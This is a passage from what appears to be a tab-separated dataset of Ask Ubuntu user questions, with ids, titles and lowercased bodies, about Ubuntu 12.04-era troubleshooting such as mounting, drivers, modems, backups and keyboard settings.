transport.com > to= < thufir @ dur.bounceme.net > proto=esmtp helo= < fqdn_test > aug 28 02:06:28 dur postfix/smtpd [ 20326 ] : disconnect from localhost [ 127.0.0.1 ] aug 28 02:06:49 dur dovecot : pop3-login : login : user= < thufir > , method=plain , rip=127.0.0.1 , lip=127.0.0.1 , mpid=20338 , tls aug 28 02:06:49 dur dovecot : pop3 ( thufir ) : disconnected : logged out top=0/0 , retr=0/0 , del=0/0 , size=0 root @ dur : ~ # the manual page is here .
181219	why am i am unable to open exe files ?	it does n't matter what disk i use , it can not open the program . i keep getting the following error : archive : /media/xxxxxxxx/install/_setupa.exe [ /media/xxxxxxxxxx/install/_setupa.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/xxxxxx/install/_setupa.exe or /media/xxxxxxxxx/install/_setupa.exe.zip , and can not find /media/xxxxxxxxx/install/_setupa.exe.zip , period . any ideas ?
181220	no enable mobile broadband option	i just migrated from wubi to actual dual booting ubuntu and windows 7 my machine is an aspire 4750g . when i had ( wubi ) ubuntu 12.04 lts 64-bit the network applet included the `` enable mobile broadband '' option . now , i am using ubuntu 12.04 lts ( 32-bit ) actual install as the 64-bit does not work . and my problem is that it does not show the `` enable mobile broadband '' option . this is so weird considering that i did not encounter the same problem in wubi based installation.. kindly help.. i have managed to connect to the internet via sakis3g script , still i find the previous method a lot more convenient..
181223	where i 'm making the mistake in here document ?	i read the use of here document . i tried something like this : echo $ * < < end anto end what i 'm trying here is , when i run this script rather than taking input from command line , i 'm asking it to take it as anto . but this does n't working for me . i 'm very new to bash scripting . can anyone say , where i 'm making the mistake ? thanks in advance .
181225	what are `` unknown '' file types ?	in /home// are , among others , the following entries . can anyone tell me what these ”unknown” file types are ? are they legitimate ? .iceauthority 2.4kb unknown .profile 675 bytes plain text document .pulse-cookie 256 bytes unknown .xauthority 48 bytes unknown .xsession-errors 28.5 kb plain text document .xsession-errors.old 7.9 kb backup file the file .xauthority contains a single line of meaningless ( to me ) letters and symbols . the file .pulse-cookie contains characters like the following in gedit , most of them highlighted in red : \ec\bd\c8\d5\ed\c2\ec\af # \b6v\ee\83\f7\c2\c8vnr\ea .iceauthority contains mostly readable phrases , almost all like these , and mostly highlighted in red : unix/pax : /tmp/.ice-unix/1494\00 # mit-magic-cookie-\00 local/pax : @ /tmp/.ice-unix/1494\00 # mit-magic-cookie-1\00 what is the difference between the paths shown in these 2 lines ? and specifically , what does the @ symbol mean in this example ? i have read that these files have a security function , and that is why i am concerned . i am new to ubuntu and do n't know whether “unknown” file type is as ominous in ubuntu as it is in windows . my computer is not networked to any other , and was not attached to the internet when these files were created . are these “unknown” files any indication of intrusion or hijack of my system ? anything i should worry about ?
181229	unsure about trim enabled on my ssd	i have a ssd ocz vertex4 installed on my laptop . i 'm running ubuntu 12.04 lts . i have enable trim by adding `` discard '' to my fstab file . ( also added option noatime ) . i rebooted my ubuntu and followed these instructions here to test trim . the end results of my tempfile was all ffff 's , when it should have read all zero 's , which is telling me trim is not really working or enabled correctly . did i miss something ? also , will it be a problem if only my /home directory is encrypted . and if you ask why i have swap on my ssd , it 's because i let ubuntu set up my partition . when i have my ssd , i just wanted to install ubuntu as fast as possible . = ) i 've done testing to see at which point it will start to use swap and it took a lot of applications open to finally use swap . i currently have 4 gb of memory . i might shrink this to like 512 mb or 1 gb the most . here 's some info about my file system setup . sudo hdparm -i /dev/sda1 | grep `` trim supported '' data set management trim supported ( limit 16 blocks ) sudo fdisk -l /dev/sda device boot start end blocks id system /dev/sda1 * 2048 242016255 121007104 83 linux /dev/sda2 242018302 250068991 4025345 5 extended /dev/sda5 242018304 250068991 4025344 82 linux swap / solaris ls /dev/mapper control cryptswap1
181230	best control panel for ubuntu 12.04 server	i am looking for up-to-date control panel that is compatible with 12.04 and easy to install . most of the open source control panels i 've seen have been out of development for years now . zpanel looks up to date , but i 've had an impossible time installing it .
181233	can i upgrade 10.04 to 12.04.1 with the desktop image ?	i am running ubuntu lucid and would like to upgrade to precise , using the normal ubuntu-12.04.1-desktop- ... iso image . so far i have tried upgrading with the cd but was not given the choice . searching on the internet , i have found upgrading using the ubuntu-12.04.1-alternate- ... iso image works , but i do n't have great internet access . is upgrading from lucid possible , with the ubuntu-12.04.1-desktop image ?
181235	partition messed up due to modifications to fstab	some system details : - dell inspiron n-4010 os : ubuntu 12.04 and windows 7 home basic ram : 2gb processor : intel core i3 tejaskale @ tejaskale-inspiron-n4010 : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf0000000 device boot start end blocks id system /dev/sda1 63 787184 393561 de dell utility /dev/sda2 * 788480 21510143 10360832 7 hpfs/ntfs/exfat /dev/sda3 21510144 326270975 152380416 7 hpfs/ntfs/exfat /dev/sda4 326273022 625141759 149434369 f w95 ext 'd ( lba ) /dev/sda5 326273024 509685759 91706368 7 hpfs/ntfs/exfat /dev/sda6 509687808 581951487 36131840 83 linux /dev/sda7 581953536 583952383 999424 83 linux /dev/sda8 583954432 591951871 3998720 82 linux swap / solaris /dev/sda9 591953920 625141759 16593920 83 linux a few days ago , i decided to shift my dropbox and .thunderbird folder to my ntfs ( non-windows ) partition ( /dev/sda5/ ) . hence , using pysdm , i activated the auto mount option . but after a day or two , i started getting the following message during boot : - mounting failed for the partition /media/new\ volume . press s to skip mounting or m to manual mounting . then i tried disabling the auto mount using pysdm but saw that the partition had become read-only . after reading about the problem online , i realized that modification of the fstab file was a way to alleviate the problem . using this very helpful tutorial ( http : //www.tuxfiles.org/linuxhelp/fstab.html ) , i modified fstab which now looks like this # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=c66c1971-3833-4c46-bf91-052554bc9b79 / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda7 during installation uuid=a0a94302-df4a-4334-b31b-35fbd3905da4 /boot ext4 defaults 0 2 # /home was on /dev/sda9 during installation uuid=a65aa0c6-d155-48d8-aef8-cfed1dc9c215 /home ext4 defaults 0 2 # swap was on /dev/sda8 during installation uuid=144c77f0-ad85-44a3-9110-1f3385fb4940 none swap sw 0 0 # new volume was on /dev/sda5 during installation uuid=ea42f6c442f69513 /media/new\040volume ntfs-3g defaults , rw , noauto , user , sync 0 0 but then i found out that since this is a ntfs partition , i required ntfs-3g to mount it and it seemed that pysdm had modified/played around with it . a bit more reading told me that rebuilding ntfs-3g was the best option and i did that using this ubuntu forums post ( http : //ubuntuforums.org/showthread.php ? t=1661757 ) . now i begin with my two problem . firstly , i see two icons for the same partition in nautilus as can be seen here . https : //plus.google.com/u/0/photos/114237712218008220104/albums/5781582665947587857/5781582672481988322.jpg when i click on the first 'new volume ' , i get the following error error mounting : mount exited with exit code 1 : helper failed with : error opening '/dev/sda5 ' : permission denied failed to mount '/dev/sda5 ' : permission denied please check '/dev/sda5 ' and the ntfs-3g binary permissions , and the mounting user id . more explanation is provided at http : //tuxera.com/community/ntfs-3g-faq/ # unprivileged when i click on the second 'new volume ' , the drive is mounted with read-write capability , but i also get the following message unable to mount new volume timeout waiting for mount to appear my second problem is that the inflow and outflow of files from 'new volume ' is very slow . earlier , while copying a video file from a usb stick to 'new volume ' used to take place at speeds of around 2mb/sec but now it barely touches 50kb/sec . also , if i try to download any file into that drive , firefox simply crashes . since one of my external hard disks , when failing , saw such reduction in file transfer speeds , i checked the smart status of my hard disk but the results seem to indicate a healthy disk tejaskale @ tejaskale-inspiron-n4010 : ~ $ sudo smartctl -- health -d ata /dev/sda smartctl 5.41 2011-06-09 r3365 [ i686-linux-3.2.0-29-generic-pae ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of read smart data section === smart overall-health self-assessment test result : passed please note the following marginal attributes : id # attribute_name flag value worst thresh type updated when_failed raw_value 190 airflow_temperature_cel 0x0022 048 036 045 old_age always in_the_past 52 ( 31 204 52 26 ) any help with either of the problems would be highly appreciated . tejas
181236	i have n't been prompted for updates in past 4 days , why ?	i 'm running 64 bit version of ubuntu but i have n't received updates from the repositories since past 4-5 days . checking the updates manually is taking 5-10 seconds to download the entire repositories whereas previously it used to take 2-3 minutes for the same process . what 's going on ? i 've got a ton of programs installed since i got my new 1tb hard drive so something should be updated during that period .
181239	virtualbox error message ( rc=-1908 ) after kernel upgrade	recently i updated my kernel to 3.2.0-29-generic . after this , my virtualbox is not opening and showing up an error message virtualbox - error in suplibosinit kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . to make it work , i have to execute the following command each time : sudo modprobe vboxdrv as suggested elsewhere . it is very annoying . can anybody help on this ? so i can run virtualbox without needing to execute that command after every boot . i must mention that , i tried several other option suggested in various forums ( including reinstalling virtualvox , dkms package , etc ) , but nothing gave me permanent solution .
181241	8gb ram only detected by reboot	i have an 8gb ram system but ubuntu 12.04 only detect 4gb by system start . every time i reboot the system ubuntu will detect the full 8gb ram ! ? ! ? ! ? amd zacate e350 apu radeon hd 6310 512mb shared memory 8gb gskill ram 2tb segate barracuda
181242	how can i upgrade ubuntu 10:04 to xubuntu 12.04.1	according to recent documentation , i 'll be given the option next time i login .. to upgrade to ubuntu 12.04.1 . but that 's not really what i want . any suggestions ?
181244	ubuntu 12.04 : starting theme/icon manager from terminal	i just installed ubuntu 12.04 which is so far amazing . now i changed the background image and want to change the theme / icons as well . in the gnome-control-center , there is no icon for changing the theme . what must i enter to start the theme manager from shell / terminal - or what must i install to do so ? yours , joern
181253	ubuntu 12.04 can not wake up from sleep	i 've upgraded my toshiba portege r500 from ubuntu 10.04 lts to 12.04 lts this weekend . the new system works smoothly , but if it enters the sleep mode , that is , if my laptop idles more than 15 minutes , the screen goes dim and turn to dark , and can not wake up anymore . i 've tried to press the ctrl-alt-f ? and other keys , nothing works , the keyboard hangs . the mouse/keypad can not work , either . the only workable key is the 'power ' . if i encounter this problem , the only way i can do is to press the 'power ' more than 3 second , and turn my laptop off ... it 's totally inconvenience . in general , the hanging situation appears if the computer idles awhile and enters the sleep mode . that is , both the login screen and the working environment after login into the system , have the same problem . anyone could help me to fix this problem ? thank you
181254	is there a way to completely remove particular keyboard layout from my xubuntu ?	i have a problem with keyboard layouts in my xubuntu . it 's described in my previous question . i tried many settings and special commands and it seemed to work ( that is why i selected my previous question as solved ) , but then i realized every now and then ( no idea when exactly and why ) it switches to czech qwertz again . after a while , it 's back to czech qwerty . that 's insane and totally against logic . my setting is en us / cz qwerty everywhere . i realized there is probably no peaceful solution . so i ask : is there a way to completely remove czech qwertz keyboard layout from my computer ? send it to a black hole at the opposite side of universe or something similar ?
181255	are there a way to find an attempt in deletion of log ?	i 'm using auditd tool for log management . i wonder is it possible to find an attempt in deletion of log using auditd . and also a way to find wrong password attempt ?
181258	no gnome shell after install on ubuntu 12.04 inside vmware workstation	i created a virtual machine for ubuntu 12.04 . i then installed gnome3 from the software center , how do i install and use the latest version of gnome shell ? . however after install i do n't get the new gnome shell , in the terminal gnome-shell -- version tells me that i 'm using the latest version , 3.4.1 . my interface now looks like this : does anybody have an idea why i do not get the latest gnome shell ? @ histo yes but why i do n't have this interface ?
181259	is it safe to downgrade x ?	i have an old graphics-card which needs the nvidia-96 drivers . but the drivers need xorg-video-abi-10 to be installed , and my version of ubuntu ( precise ) has ( i think ) an newer version , because that package is not available in the repos . i need the graphics drivers for opengl programs like google earth , blender , etc . is it safe to downgrade x or will it break other programs ( like unity 2d ) ? and if yes , where do i get the package from ?
181264	software for picture database	i would like to organise my growing collection of pictures into a database , which is searchable by filename or associated words ( tags ) . how would i best accomplish this ?
181265	automated login and screen lock	my computer only has a single user that is used for normal log in . on boot , it would be convenient of the system would log in that user automatically , and then optionally , lock the screen , such as by launching a password protected screen saver . suggestions ?
181270	ubuntu 12.04 hybridgraphics ( ati and intel ) problem ( acer aspire 7745g )	i have problem with my graphic cards . by default intel driver had installed . but i cant ' install ati driver . i want to install both this drivers , or to remove intel 's driver , install ati 's driver . how ? my graphic cards : intel corporation core processor integrated graphics controller advanced micro devices [ amd ] nee ati madison [ radeon hd 5000m series ]
181272	is it possible to restore only one directory with the backup utility ?	i use the default backup utility of ubuntu ( deja-dup ) in the settings panel . today i delete by error one directory . i tried to restore it but i did not succeed . must i restore all my backup if i only need one single directory or file ? thanks .
181273	pppd is locking the modem and not releasing it	got an issue with pppd on one of our system , we have a pc that is used to talk to remote sites via a dial up connection , the modem can both connect out to the sites and the sites also dial back in . currently i 'm having an issue where some times a site ether dials in or we dial out , and it connects , but then blocks the modem and throws and error to kern.log . aug 26 14:23:57 tm-scada kernel : [ 191233.503745 ] info : task pppd:8142 blocked for more than 120 seconds . aug 26 14:23:57 tm-scada kernel : [ 191233.503750 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . aug 26 14:23:57 tm-scada kernel : [ 191233.503753 ] pppd d ffffffff8180cb40 0 8142 1 0x00000000 aug 26 14:23:57 tm-scada kernel : [ 191233.503759 ] ffff8800ac1f5dc8 0000000000000086 ffff8800ac1f5fd8 00000000000137c0 aug 26 14:23:57 tm-scada kernel : [ 191233.503765 ] ffff8800ac1f4010 00000000000137c0 00000000000137c0 00000000000137c0 aug 26 14:23:57 tm-scada kernel : [ 191233.503770 ] ffff8800ac1f5fd8 00000000000137c0 ffffffff81c13020 ffff880135df5b80 aug 26 14:23:57 tm-scada kernel : [ 191233.503775 ] call trace : aug 26 14:23:57 tm-scada kernel : [ 191233.503784 ] [ < ffffffff8166ba29 > ] schedule+0x29/0x70 aug 26 14:23:57 tm-scada kernel : [ 191233.503790 ] [ < ffffffff813db005 > ] tty_ldisc_ref_wait+0x65/0xb0 aug 26 14:23:57 tm-scada kernel : [ 191233.503796 ] [ < ffffffff813f3061 > ] ? uart_ioctl+0xd1/0x1c0 aug 26 14:23:57 tm-scada kernel : [ 191233.503801 ] [ < ffffffff81076960 > ] ? wake_up_bit+0x40/0x40 aug 26 14:23:57 tm-scada kernel : [ 191233.503806 ] [ < ffffffff813d3fa0 > ] tty_ioctl+0x2c0/0x9a0 aug 26 14:23:57 tm-scada kernel : [ 191233.503810 ] [ < ffffffff811d0549 > ] ? fcntl_setlk+0x69/0x200 aug 26 14:23:57 tm-scada kernel : [ 191233.503815 ] [ < ffffffff81195f79 > ] do_vfs_ioctl+0x99/0x330 aug 26 14:23:57 tm-scada kernel : [ 191233.503820 ] [ < ffffffff81195212 > ] ? do_fcntl+0x232/0x410 aug 26 14:23:57 tm-scada kernel : [ 191233.503823 ] [ < ffffffff811962b1 > ] sys_ioctl+0xa1/0xb0 aug 26 14:23:57 tm-scada kernel : [ 191233.503829 ] [ < ffffffff81674e69 > ] system_call_fastpath+0x16/0x1b the syslog trace stops at `` serial connection established '' . aug 28 06:00:03 tm-scada pppd [ 10358 ] : pppd 2.4.5 started by root , uid 0 aug 28 06:00:04 tm-scada chat [ 10360 ] : abort on ( no carrier ) aug 28 06:00:04 tm-scada chat [ 10360 ] : abort on ( no dialtone ) aug 28 06:00:04 tm-scada chat [ 10360 ] : abort on ( error ) aug 28 06:00:04 tm-scada chat [ 10360 ] : abort on ( no answer ) aug 28 06:00:04 tm-scada chat [ 10360 ] : abort on ( busy ) aug 28 06:00:04 tm-scada chat [ 10360 ] : abort on ( username/password incorrect ) aug 28 06:00:04 tm-scada chat [ 10360 ] : send ( atz^m ) aug 28 06:00:04 tm-scada chat [ 10360 ] : expect ( ok ) aug 28 06:00:04 tm-scada chat [ 10360 ] : atz^m^m aug 28 06:00:04 tm-scada chat [ 10360 ] : ok aug 28 06:00:04 tm-scada chat [ 10360 ] : -- got it aug 28 06:00:04 tm-scada chat [ 10360 ] : send ( atx0^m ) aug 28 06:00:04 tm-scada chat [ 10360 ] : expect ( ok ) aug 28 06:00:04 tm-scada chat [ 10360 ] : ^m aug 28 06:00:04 tm-scada chat [ 10360 ] : atx0^m^m aug 28 06:00:04 tm-scada chat [ 10360 ] : ok aug 28 06:00:04 tm-scada chat [ 10360 ] : -- got it aug 28 06:00:04 tm-scada chat [ 10360 ] : send ( atdt0123456789^m ) aug 28 06:00:04 tm-scada chat [ 10360 ] : expect ( connect/arq ) aug 28 06:00:04 tm-scada chat [ 10360 ] : ^m aug 28 06:00:30 tm-scada chat [ 10360 ] : atdt0123456789^m^m aug 28 06:00:30 tm-scada chat [ 10360 ] : connect/arq aug 28 06:00:30 tm-scada chat [ 10360 ] : -- got it aug 28 06:00:30 tm-scada pppd [ 10358 ] : serial connection established . i 've only found two ways to release the modem in this condition , the first is to turn the modem off and on again , the second is to delete the serial lock file , and then sigkill pppd . now i could write into our software to do the latter if the modem is locked , but i would rather stop it from locking in the first place if at all possible . the reason i put this issue in the askubuntu is because we used to use opensuse and never had an issue with it , admittedly that was version 11.2 or earlier so its still and old kernel , but i figured i would ask here first anyway . any suggestions of places to look would be appreciated .
181274	which version of ubuntu can i install on these specs ?	i want to install ubuntu on my pc . which version would suit a desktop and these specifications ? my specs : - amd atholon 64 3000+ 1gb ddr ram 750gb asus k8v-mx main board thanks in advance !
181279	firefox losing functions after opening a link from dash	i 'm using firefox as default browser in 12.04.1 lts . whenever i 'm using the bookmarks-lens or the web-hitory-lens of the unity dash to open a bookmark in firefox , pulldown-menus on websites do n't get opened and the autofill finctionality is lost . closing and re-launching firefox makes everything work fine again . has anybody encountered this issue and knows a solution ? thanks in advance ! sascha
181284	maas and pxe boot problem	i have problem with commissioning my nodes because i stuck with this . i add node using cd and node appear in dashboard of server . then i clicked `` accept & commission '' then my node boot up and is finally connecting to maas server but when it tries to download image then stops like this : and nothing happens . and in dashboard is still commissioning . here is video how its booting : http : //youtu.be/jvmqe6svxme
181295	basiliskii in12.04	i 'm trying to install basilisk2 on 12.04 . i converted the rpm from http : //basilisk.cebix.net/ # download to deb . running it , however , gives me : basiliskii : error while loading shared libraries : libgtk-1.2.so.0 : can not open shared object file : no such file or directory any ideas ?
181296	accessing synced tomboy notes online .	where can i access synced tomboy notes online ? i can not see notes in the ubuntu one web interface .
181299	not accessible local host 127.0.0.1 of squid proxy server in ubuntu	i have configure squid proxy server on ubuntu 11.10. it 's working fine but when i accessed local host 127.0.0.1 in firefox browser it shows an error unable to connect & firefox ca n't establish a connection to the server at 127.0.0.1 . please can you tell me where should be change in the squid.conf file for accessing the local host .
181300	what are mailing lists and how do they function ?	ever since i joined the *nix side of the world i 've been hearing about mailing lists a lot ( especially when it comes to development ) . can someone explain to me what they are and how i can interact with them ?
181302	is it possible to share an exchange calendar with another outlook user using thunderbird/lightning ? if so , how ?	i am not on a windows machine and can not access outlook other than outlook.companyname.com . i have my exchange email set up through thunderbird/lightning and synced my exchange calendar . how can i share my exchange calendar with another outlook user ? thank you .
181306	apache2 memory limit	what does setting your memory limit to -1 do in php.ini for apache2 . i assume it just gives it unlimited memory but im not sure could anybody clarify ? dont want it chewing through all my memory ha ! thanks
181312	i ca n't turn on wifi after installed ubuntu	it shows that my laptop is now airplane mode , i ca n't turn on wifi . after i turned off the airplane mode , still ca n't turn on wifi . what is the problem ?
181316	using wifi with 12.04 causes network to crash	i just came home to my parents ' house after a year abroad , during which i installed ubuntu 12.04 on my laptop . in that year i was using wired internet via the ethernet port on my laptop almost exclusively , and had very few problems with my laptop . however , when i came home i started to use the wireless and the problem started . firstly , when i use the wifi in ubuntu , the connection is exceptionally weak , usually no more than two bars of signal ( judging by the indicator applet ) and speed is fairly minimal . secondly , using the wifi for more than about an hour ( i have n't actually measured it , but sometimes it 's more , sometimes less ) causes not only my laptop to disconnect from the network , but any other connected device to disconnect as well . the only solution is to restart the router . thirdly , when i do connect to the network , i get an error message telling me that there 's a problem with using a .local address ( i ca n't remember the exact wording ) . currently , i am writing this in windows 7 ( on the same laptop ) with no issues whatsoever , so it is nothing to do with my laptop/wireless card . it is just a problem with ubuntu . this is the router we use , and these are the specifications of my laptop . i 've had a good search already , but not much seems to work . i intend to try this next , and i will post an update when i have tried it . i am open to just about any solution , barring buying a new router/laptop/wireless card etc . update : this only appears to be an issue when i 've used the battery at any point whilst ubuntu is loaded .
181318	how to start ubuntu installer in a graphical safe mode ?	i am trying to install ubuntu 11.10 on a dell optiplex 3010 ivybridge and when i start the setup , the screen goes awry with a lot of colored patterns . is there a way to start the installer in text mode or a graphical safe-mode ? on ubuntu 11.04 , it works well .
181321	what folders do i restore from backup ?	i have just re-installed 10.04 from scratch , and am now rebuilding my system from backup . so far i have restored my home folder , so that my desktop looks familiar , but some application shortcuts are incomplete . can you please tell me which other folders to restore , as well as which to avoid , in order to put my system back as it was ?
181326	failing to set an /29 network address	i 'm trying to set up a server with a /29 network address ( i 've been given a subnet on my dsl connection ) . i set the router 's lan ip to the gateway for the range ( call it xxx.xxx.xxx.176 ) . i then proved the routing with a windows box and pinging google - setting the ip address to xxx.xxx.xxx.177 and with a subnet of 255.255.255.248 then i tried to set my server up - i downed the network service and edited the interfaces file : auto eth0 iface eth0 inet static address xxx.xxx.xxx.178 netmask 255.255.255.248 gateway xxx.xxx.xxx.176 but when i restarted the network service , i got a message scioaddrt no such process i could ping the 177 computer , but not the gateway - and routing to external addresses was right out .
181330	how to disable ubuntu software centre for user ?	as administrator i want to be sure user can not download inappropriate applications .
181335	dual boot : ubuntu 12.04 with windows 7 on a 240gb ssd	i would like to replace the hd in my laptop ( asus i3 , 4gb , 13.3 '' ) for a ssd . the information i 've found is not precise . i would appreciate your advice/links on : preparation of ssd . partitions on a 240gb ssd : boot/ubuntu/windows/data . size of partitions . steps . installing ubuntu 12.04 . installing windows 7 . i intend to prepare a document with all the steps once the installation is completed . thanks !
181336	tlmgr viatex live backports ppa	i just installed tex live 2012 , -- on ubuntu 12.04 -- via a this ppa , but can not seem to figure out how to install tlmgr . i need help installing it .
181341	how do i set a custom keyboard shortcut to control volume ?	i would like to be able to set three custom keyboard shortcuts to be able to decrease , increase and mute the volume in ubuntu 12.04 ( unity ) . on my old ubuntu 10.04 ( gnome ) system i made ctrl + [ , ctrl + ] and ctrl + \ my commands to achieve this . what is the simplest way to go about this ?
181343	can i install 32-bit ubuntu alongside os x 10.7/10.8 in macbook pro ?	i have samsung r430/p430 and macbook pro . the samsung r430/p430 have ubuntu and windows 7 ultimate . but in macbook pro is running mac os x 10.7/10.8 . it has 100gb+ internal hard drive . can i run 32-bit ubuntu alongside mac os x ?
181347	gnome3 desktop empty ( no panels )	i 'm on ubuntu 12.04 and using gnome 3 . this morning , after an update and a reboot , there was no longer a panel on the desktop . i have two monitors , if that makes any difference . i tried uninstalling any gnome-shell-extensions ( i have gnome-shell-extension-prefs and gnome-shell-extension-tool ) but it could n't find any package by those names . i 'm not even sure this is the reason that the panel is gone , it happened after an update .
181349	making a backtick produce just a backtick	my backtick key ( ` ) produces nothing when first pressed - i have to press it twice to generate a ` . if i forget , and type ` e , i get an accented e character . i am only able to fix this temporarily , for the current session , by running : xmodmap -e 'keycode 49 = grave asciitilde' the problem is , i ca n't figure out how to make this change permanent . i have found many related questions on ask ubuntu , but none that solve this specific problem . i am using kde .
181350	brightness control works only in ubuntu , does n't in xubuntu/lubuntu/kubuntu/mint ( toshiba satellite l30 )	all tested os were in latest versions ( 12.04.1 and mint 13 mate & xfce ) . already tried xfce panel aplet for screen brightness , acpi_backlight=vendor argument in grub_cmdline_linux_default and replacing xfce-power-manager with gnome-power-manager . default keyboard shortcut for brightness control should be fn+f6/f7 . shortcuts for mute , volume up , down and for disable/enable wifi are working properly . for now , i 'm able to control brightness only by terminal echo 1 | sudo tee /sys/class/backlight/acpi_video0/brightness . just checked debian wheezy with gnome 3 - also works , but i really want to install xubuntu on this machine .
181352	how to start xserver with default graphics driver ?	i have a acer netbook with intel gma 3600 graphics . yesterday i installed cedarview graphics driver after reading this post . now , i have been observing that after i installed the driver my system seems laggy like pdfviewer hangs while scrolling , chrome hangs , and some other similar issue which i believe were not present before i installed the driver . earlier my netbook was using the default graphics driver that came with ubuntu 12.04 ( kernel generic-pae 3.2 ) . so , is there any way i can restart my xserver without the cedarview driver and check if i am facing the similar issues there also or i have to manually uninstall the drivers ( cedaview ) . if you all suggest to uninstall it than sudo apt-get -- purge remove cedarview-drm libva-cedarview-vaapi-driver cedarview-graphics-drivers & & sudo update-grub2 is the correct way to uninstall it ?
181353	howto cleanly unmount a root filesystem that 's using aufs	preface : i 've made a boot-image that boots up debian/ubuntu using squashfs and aufs . the image contains a cleaned up debootstrap install , compressed into a squashfs image . the squashfs image is considered the readonly part of my filesystem . the local harddrive is considered the writable part of my root filesystem . all setup of the rootfs is done from initramfs which calls switch_root to boot-up debian/ubuntu . the rootfs itself is mounted using aufs on the squash image ( ro ) and the harddrive ( rw ) . when the initramfs is running , i check if the harddrive is cleanly unmounted . i make sure it 's clean before i mount it by calling 'fsck -cp ' ( i know , i should n't ) . the problem : the problem that i have , is that the writable part of my root filesystem is never unmounted properly , leaving it ( eg , the hdd ) in an unclean state . the base of the problem is obviously that the hdd is in use by the aufs filesystem . the aufs filesystem is obviously in use by the rootfs . next to that , i figure that the debian/ubuntu shutdown procedure must be modified to allow this . what have i done so far : i have tried to shutdown by hand , by first going into runlevel 1 , and forcing ro-remounts of the rootfs and the hdd , but the hdd is still never unmounted cleanly . i also changed the way aufs is mounted by adding an option to create the xino file outside the harddrive mount . i never see the file being created , nor can i see any open files on the harddrive using lsof . last but not least , i added the harddrive to the fstab of the ubuntu install to have it recognize it . did n't change a thing when debian/ubuntu shuts down though : ( from the looks of it , i have created a `` chicken and egg '' problem , as i ca n't unmount the harddrive without first unmounting the root filesystem , which i need to unmount the harddrive lol . i have n't got the faintest idea of what commands to run , in order to unmount it properly , so any help is very much appreciated .
181356	how to delete all desktop environments except unity ?	i am using ubuntu 12.04 with many desktop environments like unity , gnome , lubuntu , xubuntu , cinnamon and many . now i 'd like to remove all except ubuntu because they all are messing with my main unity desktop . so i want to keep ubuntu-desktop and want to remove all other .
181357	where can i find logs regarding the user creation ?	i created a new user using useradd command . i need the logs for it . where it will be available . thanks in advance .
181360	`` failed to load session `` ubuntu '' '' problem	i run ubuntu 12.04 . after installation i have disabled guest account , removed error notification , gave myself super user rights . i made some applications in /usr/applications useable only for me , created standard user account . then i pressed restart in shut down menu , but system just logged off . after rebooting by terminal there was `` failed to load `` ubuntu '' '' notification . i do n't know if it was my fault , but really have to fix that problem . by the way , i have no internet access for that pc . hope you will help me !
181363	how do i see my system volume level when changing it ?	back when i used 10.04 lts and would change my system volume via custom keyboard shortcuts i would always get a nice volume level box that would appear to the top right corner of the screen . i had this also happen when i changed my display brightness . now i am on 12.04 and using unity desktop . when i change my display brightness the brightness level box appears as expected like so but when i change my volume level via custom keyboard shortcuts i get no volume level box showing up indicating a volume change has taken place . all i see is that little panel notification speaker icon 's sound waves change a little bit . 3 levels is not enough feed back though . so how do i get a nice volume level box to show up when changing the volume ? update 1 tried to fix the keyboard shortcuts using aleprovencio 's suggestions but it broke what already did work . update 2 weird i am able to get the volume level box to show up when i use the volume wheel on my computer but i want to make it show up with the custom keyboard shortcuts i created in ubuntu tweak like in the image below : now the question is : what are the system commands that trigger both the volume changes and the volume level boxes to appear ?
181367	logitech c270 webcam and skype	i have recently purchased the logitech c270 webcam to use for skype . the video works perfectly , but the mic is useless . i have changed the input to the mic on system settings and pulseaudio , and it gives feedback and shows that the mic is working . i have also successfully recorded a clip with it on audacity and that works fine . any help would be much appreciated .
181368	notebook dual monitor setup - wallpaper resolution changes on restart or relog	on every relog or restart the wallpaper resolution on my external monitor is downgraded to the resolution of my smaller notebook panel . as a result , crisp and clear backgrounds , such as the ones precise comes with , are rendered blurry . to revert the changes made by the system each time i have to reset the wallpaper with this procedure : right click ( on external monitor ) -- > change desktop background -- > click on a different background and then again on the previously selected one my dual monitor setup is as follows : 13 '' notebook panel , 1366x768 22 '' external display , 1920x1080 according to amdccc my notebook panel is configured as the primary adapter ( screen number 1 ) . this problem only affects the desktop itself . wallpapers are rendered correctly on the login screen . how can i prevent the system from messing up my wallpaper configuration ?
181370	how heavy on resources is cinnamon desktop environment ?	i have a 1gb ram pc running lubuntu . in xubuntu is still ok , but in kde and unity it is not . ( the condition of my pc appears clearly in this answer ) . compared to these de-s , where stands cinnamon ? i am in the mood to try it but i thought maybe to ask first : )
181371	google keep asking for permission to authorize my online account	seems like google accounts authorized are not persistent . every time i reboot `` online accounts '' loses the permissions and i have to re-authorize ubuntu . is this the default behaviour ? is there any patch/fix ?
181375	how to get the default ubuntu graphic driver for 12.04 ?	i recently installed nvidia graphic driver nvidia-linux-x86_64-304.43.run downloaded from nvidia official website that meet my graphic card gfroce gt 540m . however , i got worse graphic on my display resolution changed to 640x640 crt mode . my laptop is 1366x768 . may i get a better graphic than the default install ? or ubuntu default install graphic is best ? please help me to get the default ubuntu graphic driver that is installed together with system installation .
